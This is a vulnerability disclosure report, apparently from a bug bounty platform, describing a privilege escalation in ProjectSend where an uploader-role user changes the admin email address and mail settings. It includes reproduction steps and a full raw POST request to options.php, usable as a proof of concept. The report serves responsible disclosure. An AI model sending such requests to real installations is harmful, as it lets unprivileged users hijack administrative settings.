Incorrect Privilege Assignment in projectsend/projectsend
Valid
Reported on
Jul 2nd 2021
💥 BUG
privilege escalation bug to update admin email-address and company name etc .
💥 IMPACT
unprivileged user can update admin email-address and company name etc
💥 STEP TO REPRODUCE
1. From admin account goto http://localhost/projectsend2/users.php and add new user called user-B with uploader role .
2. Now goto user-B account and there is no options to update company name.
Now user-B sent bellow request to to update company-name ,company-email.\
POST /projectsend2/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------22961416713886144272049413533
Content-Length: 1742
Origin: http://localhost
Connection: close
Referer: http://localhost/projectsend2/options.php?section=email
Cookie: PHPSESSID=c7uh0bkpk72ffue6lbbcbnmtjm;
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="csrf_token"
2295df1e93d7e67b6c756bb4157d54d82639238b35968e79261f9e180294d4b1
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="section"
email
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="admin_email_address"
admin@localhost.com
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_from_name"
bugbounty_by_user
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_copy_addresses"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="notifications_max_tries"
2
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="notifications_max_days"
15
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_system_use"
mail
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_user"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_pass"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_host"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_port"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_auth"
none
-----------------------------22961416713886144272049413533--
Here in this request change csrf tokken with user-B csrf token and forward the request in burpsuite interception tool and see user-B can company-name, email-id etc.
So, user-B with uploader can update company-name, email-id etc .
We have contacted a member of the
projectsend
team and are waiting to hear back
2 years ago
to join this conversation